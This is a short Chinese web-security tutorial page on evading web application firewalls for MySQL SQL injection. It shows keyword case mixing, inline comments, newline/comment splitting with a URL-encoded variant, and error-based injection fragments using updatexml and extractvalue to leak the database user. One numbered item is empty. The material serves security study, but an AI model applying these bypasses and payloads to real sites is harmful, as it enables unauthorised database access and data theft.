WAF绕过tips----mysql - 网站安全 - 自学php-自学php网

WAF绕过tips----mysql - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 1、转换大小写1234567mysqlSeLECt1,2;+---+---+|1|2|+---+---+|1|2|+---+---+1rowinset(0.02sec)2、内联注释1234567mysql/*!select*//**/1,2;+---+---+|1|2|+---+---+|1|2|+---+---+1rowinset(0.00sec)3、换行......

1、转换大小写

1
2
3
4
5
6
7

mysql> SeLECt 1,2;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.02 sec)

2、内联注释

1
2
3
4
5
6
7

mysql> /*!select*//**/1,2;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.00 sec)

3、换行 www.2cto.com

1
2
3
4
5
6
7
8
9
10
11
12

mysql> select
    -> #abc
    -> 1,
    -> 2
    -> #abc
    -> ;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.06 sec)

url---->select%0a%23abc%0a1,%0a2#23abc

4、表后面加xxx

1
2
3
4
5
6
7
8

5、冷门函数

1
2
3

and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))

and extractvalue(1, concat(0x5c, (select user()),0x5c));

不过这两条语句要报错模式，msyql版本大于5.1

ps：后续更新。

Thinksns某SNS功能极品XSS，通杀WEB和IOS客户端 - 网站

WAF绕过tips---%u encoding - 网站安全 - 自学php

子栏目

WAF绕过tips----mysql - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论